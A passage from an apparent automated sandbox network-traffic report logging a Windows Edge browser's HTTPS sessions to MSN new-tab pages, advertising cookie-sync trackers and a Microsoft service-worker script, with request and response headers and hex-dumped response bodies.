                                                                                                                                                                  Data Ascii: 2c3y/beaconstatus?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrnt


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  29192.168.11.206399935.208.249.213443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC643OUTGET /cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: trace.mediago.io
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC291INHTTP/1.1 200 OK
                                                                                                                                                                  Set-Cookie: __mguid_=09ac98cf9b8c603c1kwzpe00m5rtzias; Path=/; Domain=mediago.io; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  30192.168.11.206359720.33.55.12443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC630OUTGET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: sync.inmobi.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC362INHTTP/1.1 302 Found
                                                                                                                                                                  vary: Origin,Access-Control-Request-Method,Access-Control-Request-Headers
                                                                                                                                                                  location: https://sync.inmobi.com/sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry=
                                                                                                                                                                  content-length: 0
                                                                                                                                                                  date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  x-envoy-upstream-service-time: 0
                                                                                                                                                                  server: envoy
                                                                                                                                                                  connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  31192.168.11.2064557204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC996OUTGET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=cae0bcac-0788-4314-8d6d-ef1f6cde9e84&ii=1&c=2556969255498558843&bid=af84565f-f8a6-4f2f-a974-1cccfb0c3669&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:34 UTC581INHTTP/1.1 204 No Content
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Expires: -1
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 735FB8AAD07F440E97A5E9988602577B Ref B: CHI30EDGE0218 Ref C: 2025-01-11T06:54:34Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  32192.168.11.206227968.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC654OUTGET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: ib.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC1514INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://ib.adnxs.com/bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D
                                                                                                                                                                  AN-X-Request-Uuid: 8e5ba2e9-f8c8-4fcd-9fea-7bbeea12a01b
                                                                                                                                                                  Set-Cookie: XANDR_PANID=Dzt1Mfg-T7nsPQH62HphfAPQoX13gPVZRtUopwtIW2VdwBSsnX9T4m5AM-jmuZZtsScyjMQVK11XOmSOnlkqYSGqnV4qHCLzjBXk49C5Z6k.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:34 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=7512390005418532596; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  33192.168.11.206038852.223.22.214443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC615OUTGET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1
                                                                                                                                                                  Host: eb2.3lift.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC172INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Content-Length: 37
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                  2025-01-11 06:54:34 UTC37INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  34192.168.11.206499568.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC862OUTGET /mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC1684INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://m.adnxs.com/bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D
                                                                                                                                                                  AN-X-Request-Uuid: dfc9fbed-9845-463d-90b1-3ff9cfdb5bdf
                                                                                                                                                                  Set-Cookie: XANDR_PANID=dc90dIu-8g6FooxaAAmTXWFNP_Hv6Jkck0rAD1xwQehGaU0WaC8aUE1ifGE32ZeM9IJqiaWhWdN0e6qUYs_hiazi6HZ12OK-prfnp4UOCN0.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:34 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=5506314360893628760; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  35192.168.11.205897035.213.89.133443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC641OUTGET /cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: trace.popin.cc
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                  Set-Cookie: __mguid_=09ac98cf9b8c603c1fcdhl00m5rtzis5; Path=/; Domain=popin.cc; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  36192.168.11.2052471204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC1517OUTGET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1
                                                                                                                                                                  Host: ntp.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Service-Worker: script
                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                  Sec-Fetch-Mode: same-origin
                                                                                                                                                                  Sec-Fetch-Dest: serviceworker
                                                                                                                                                                  Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79ce19f4-5d97-4e79-bde7-86678df03e68; ai_session=4GQ3I+JGTtsRdJFn4pBfwj|1736578471570|1736578471570; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:34 UTC1426INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: xkYuE3wFd96UmOvXHVXasQ==
                                                                                                                                                                  Last-Modified: Fri, 10 Jan 2025 20:39:44 GMT
                                                                                                                                                                  ETag: 0x8DD31B6EA9E31D7
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  x-ms-request-id: 0aba0028-701e-001c-159f-63e91d000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Akamai-Request-BC: [a=23.52.41.141,b=119078172,c=g,n=US_IL_CHICAGO,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=1, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                  Akamai-Server-IP: 23.52.41.141
                                                                                                                                                                  Akamai-Request-ID: 718fd1c
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Service-Worker-Allowed: /
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.8d293417.1736578474.718fd1c
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 9873622DBA104BB3B14221524A1149AD Ref B: CHI30EDGE0306 Ref C: 2025-01-11T06:54:34Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:34 UTC3164INData Raw: 63 35 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3b 65 6c 73 65 7b 76 61 72 20 73 3d 74 28 29 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 73 29 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 3a 65 29 5b 6e 5d 3d 73 5b 6e 5d 7d 7d 28 73 65 6c 66 2c 28 28 29 3d 3e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74
                                                                                                                                                                  Data Ascii: c55!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict
                                                                                                                                                                  2025-01-11 06:54:34 UTC8200INData Raw: 32 30 30 30 0d 0a 42 61 73 65 50 61 67 65 4e 61 76 41 67 65 4d 69 6e 75 74 65 73 3d 22 73 73 72 42 61 73 65 50 61 67 65 4e 61 76 41 67 65 4d 69 6e 75 74 65 73 22 2c 65 2e 65 6e 61 62 6c 65 57 69 64 67 65 74 73 52 65 67 69 6f 6e 3d 22 65 6e 61 62 6c 65 57 69 64 67 65 74 73 52 65 67 69 6f 6e 22 2c 65 2e 64 69 73 61 62 6c 65 44 65 66 61 75 6c 74 4e 61 76 69 67 61 74 69 6f 6e 52 6f 75 74 65 3d 22 64 69 73 61 62 6c 65 44 65 66 61 75 6c 74 4e 61 76 69 67 61 74 69 6f 6e 52 6f 75 74 65 22 2c 65 2e 64 69 73 61 62 6c 65 52 69 76 65 72 4e 65 74 77 6f 72 6b 46 69 72 73 74 3d 22 64 69 73 61 62 6c 65 52 69 76 65 72 4e 65 74 77 6f 72 6b 46 69 72 73 74 22 7d 28 70 7c 7c 28 70 3d 7b 7d 29 29 3b 63 6f 6e 73 74 20 67 3d 5b 22 65 6e 61 62 6c 65 4e 65 74 77 6f 72 6b 46 69 72
                                                                                                                                                                  Data Ascii: 2000BasePageNavAgeMinutes="ssrBasePageNavAgeMinutes",e.enableWidgetsRegion="enableWidgetsRegion",e.disableDefaultNavigationRoute="disableDefaultNavigationRoute",e.disableRiverNetworkFirst="disableRiverNetworkFirst"}(p||(p={}));const g=["enableNetworkFir
                                                                                                                                                                  2025-01-11 06:54:34 UTC3799INData Raw: 65 64 30 0d 0a 70 64 61 74 65 22 29 29 61 77 61 69 74 20 65 28 7b 63 61 63 68 65 4e 61 6d 65 3a 6c 2c 6f 6c 64 52 65 73 70 6f 6e 73 65 3a 70 2c 6e 65 77 52 65 73 70 6f 6e 73 65 3a 6f 2e 63 6c 6f 6e 65 28 29 2c 72 65 71 75 65 73 74 3a 72 2c 65 76 65 6e 74 3a 74 68 69 73 2e 65 76 65 6e 74 7d 29 3b 72 65 74 75 72 6e 21 30 7d 61 73 79 6e 63 20 67 65 74 43 61 63 68 65 4b 65 79 28 65 2c 74 29 7b 63 6f 6e 73 74 20 73 3d 60 24 7b 65 2e 75 72 6c 7d 20 7c 20 24 7b 74 7d 60 3b 69 66 28 21 74 68 69 73 2e 5f 63 61 63 68 65 4b 65 79 73 5b 73 5d 29 7b 6c 65 74 20 6e 3d 65 3b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 74 68 69 73 2e 69 74 65 72 61 74 65 43 61 6c 6c 62 61 63 6b 73 28 22 63 61 63 68 65 4b 65 79 57 69 6c 6c 42 65 55 73 65 64 22 29 29 6e 3d 46 28 61 77 61
                                                                                                                                                                  Data Ascii: ed0pdate"))await e({cacheName:l,oldResponse:p,newResponse:o.clone(),request:r,event:this.event});return!0}async getCacheKey(e,t){const s=`${e.url} | ${t}`;if(!this._cacheKeys[s]){let n=e;for(const e of this.iterateCallbacks("cacheKeyWillBeUsed"))n=F(awa
                                                                                                                                                                  2025-01-11 06:54:34 UTC8200INData Raw: 32 30 30 30 0d 0a 3e 22 63 61 63 68 65 57 69 6c 6c 55 70 64 61 74 65 22 69 6e 20 65 29 29 7c 7c 74 68 69 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 73 68 69 66 74 28 44 29 7d 61 73 79 6e 63 20 5f 68 61 6e 64 6c 65 28 74 2c 73 29 7b 63 6f 6e 73 74 20 6e 3d 73 2e 66 65 74 63 68 41 6e 64 43 61 63 68 65 50 75 74 28 74 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 7d 29 29 3b 6c 65 74 20 61 2c 72 3d 61 77 61 69 74 20 73 2e 63 61 63 68 65 4d 61 74 63 68 28 74 29 3b 69 66 28 72 29 3b 65 6c 73 65 20 74 72 79 7b 72 3d 61 77 61 69 74 20 6e 7d 63 61 74 63 68 28 65 29 7b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 28 61 3d 65 29 7d 69 66 28 21 72 29 74 68 72 6f 77 20 6e 65 77 20 65 28 22 6e 6f 2d 72 65 73 70 6f 6e 73 65 22 2c 7b 75 72 6c 3a 74 2e 75 72 6c 2c 65
                                                                                                                                                                  Data Ascii: 2000>"cacheWillUpdate"in e))||this.plugins.unshift(D)}async _handle(t,s){const n=s.fetchAndCachePut(t).catch((()=>{}));let a,r=await s.cacheMatch(t);if(r);else try{r=await n}catch(e){e instanceof Error&&(a=e)}if(!r)throw new e("no-response",{url:t.url,e
